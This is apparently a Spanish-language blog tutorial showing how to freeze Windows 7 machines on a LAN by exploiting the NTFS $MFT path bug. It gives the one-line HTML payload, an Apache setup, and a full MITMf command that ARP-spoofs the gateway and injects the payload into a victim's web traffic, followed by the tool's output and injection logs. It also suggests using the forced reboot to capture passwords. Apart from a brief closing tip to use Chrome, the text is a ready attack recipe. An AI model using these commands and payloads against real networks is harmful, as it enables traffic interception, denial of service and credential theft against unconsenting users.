Vulnerabilidades: C:\$MFT, Bloqueando equipos en la LAN con MITMf

Aunque aun no reconocido por Microsoft, el nuevo bug descubierto por Anatolymik (En Ruso), Investigador de la firma Alladin Information, permite bloquear los sistemas Windows 7 y 8.1 con un simple llamado de archivos.

$MFT, guarda una entrada para cada archivo dentro del sistema de archivos NTFS, cuando accedemos por ejemplo C:\$MFT\hola.txt, el sistema de archivos de NT (NTFS) crea un bloqueo en dicho recurso y no lo deja ir.

Esta vulnerabilidad podemos explotarla localmente, o remotamente via Internet Explorer o Firefox, Chrome no es vulnerable, y si bien podemos engañar al usuario para que entre a una pagina creada para explotar esta vulnerabilidad, tambien podemos forzarlo usando MITMF.

Preparando el ambiente

Vamos a utilizar una maquina Windows 7, con la dirección Ip 192.168.1.67, y una maquina Kali Linux, usando la direccion IP 192.168.1.111

Ataque MFT MITMF
Ataque MFT MITMF

Como necesitamos servir el código malicioso, vamos a subir apache2 en nuestra máquina Kali de la siguiente forma

root@kali:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@kali:~# 

También necesitamos un archivo html que contenga la llamada a $MFT, para que podamos inyectarlo en un iframe a nuestra víctima.
Este archivo vamos a ponerle el nombre nice.html, y debemos ubicarlo en /var/www/html

root@kali:/var/www/html# ls
index.html  nice.html
root@kali:/var/www/html# cat nice.html 
<html>
<img src="c:\$MFT\123" alt="Smiley face" height="42" width="42">
</html>
root@kali:/var/www/html#

El archivo html es bastante sencillo, pero cumple la tarea a la perfección.
Y con este quedamos listos para lanzar al ataque.

Lanzando el ataque

Lo primero que debemos hacer es verificar que nuestro servidor apache este arriba

root@kali:/var/www/html# /etc/init.d/apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2017-05-30 12:16:16 EDT; 5min ago
  Process: 1104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 1115 (apache2)
    Tasks: 7 (limit: 4915)
   CGroup: /system.slice/apache2.service
           ├─1115 /usr/sbin/apache2 -k start
           ├─1133 /usr/sbin/apache2 -k start
           ├─1134 /usr/sbin/apache2 -k start
           ├─1135 /usr/sbin/apache2 -k start
           ├─1136 /usr/sbin/apache2 -k start
           ├─1137 /usr/sbin/apache2 -k start
           └─1138 /usr/sbin/apache2 -k start

May 30 12:16:15 kali systemd[1]: Starting The Apache HTTP Server...
May 30 12:16:16 kali apachectl[1104]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' d…s this message
May 30 12:16:16 kali systemd[1]: Started The Apache HTTP Server.
Hint: Some lines were ellipsized, use -l to show in full.

Una vez verificada esta parte, podemos lanzar MITMf para inyectar este html a nuestra víctima, el comando es el siguiente

root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html

Aqui le estamos indicando a MITMf que haga spoofing de la puerta de enlace 192.168.1.254, que nuestra victima es la maquina 192.168.1.67 y que queremos inyectar el html http://192.168.1.111/nice.html en el navegador de nuestra victima.

La salida del comando debe ser similar a la siguiente

root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html

@@@@@@@@@@   @@@  @@@@@@@  @@@@@@@@@@   @@@@@@@@  
@@@@@@@@@@@  @@@  @@@@@@@  @@@@@@@@@@@  @@@@@@@@  
@@! @@! @@!  @@!    @@!    @@! @@! @@!  @@!       
!@! !@! !@!  !@!    !@!    !@! !@! !@!  !@!       
@!! !!@ @!@  !!@    @!!    @!! !!@ @!@  @!!!:!    
!@!   ! !@!  !!!    !!!    !@!   ! !@!  !!!!!:    
!!:     !!:  !!:    !!:    !!:     !!:  !!:       
❗     ❗  ❗    ❗    ❗     ❗  ❗       
:::     ::    ::     ::    :::     ::    ::       
 :      :    :       :      :      :     :        

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
Error starting HTTP server: [Errno 98] Address already in use
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

Cuando nuestra victima, visite cualquier pagina, MITMf tratara de inyectar nuestro html al navegador.

2017-05-30 12:27:07 192.168.1.67 [type:IE-8 os:Windows 7] www.bing.com
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] elpais.com.co
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co
2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] sso.elpais.com.co
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.googletagservices.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.google.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s7.addthis.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] code3.adtlgc.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] tag.navdmp.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] raw.githack.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] b.scorecardresearch.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] cdn.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] comcluster.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:Other-Other os:Other] g.symcd.com
2017-05-30 12:27:34 192.168.1.67 [type:Other-Other os:Other] clients1.google.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.gstatic.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] tpc.googlesyndication.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: tpc.googlesyndication.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:35 192.168.1.67 [type:IE-8 os:Windows 7] 192.168.1.111

Podemos ver que el Iframe fue inyectado con éxito varias ocasiones

2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co
2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co

Esto nos indica que el html fue inyectado exitosamente, con lo que nuestra victima debe estar sufriendo de lentitud enorme en su equipo

Máquina Windows 7 bloqueada por ataque $MFT usando MITMf
Máquina Windows 7 bloqueada por ataque $MFT usando MITMf

En este momento, nuestro usuario debe reiniciar el equipo, lo que podemos usar para capturar contraseñas cuando se conecte de nuevo a los recursos compartidos.

Notas finales

Este tipo de ataque es muy sencillo de realizar, el vector aquí mostrado es solo uno de los tantos posibles, Microsoft aún no se ha manifestado sobre esta vulnerabilidad, por lo que seguramente veremos ataques de este tipo en aumento durante las próximas semanas.

Finalmente, veamos el asciinema de este ataque

Como vemos, es muy fácil aprovechar esta vulnerabilidad, de momento para evitar ser víctimas de este ataque, debemos usar Chrome, o esperar a que Microsoft y Firefox parchen sus respectivos sistemas operativos y exploradores.

Saludos 🙂

Deja tu comentario

%d bloggers like this: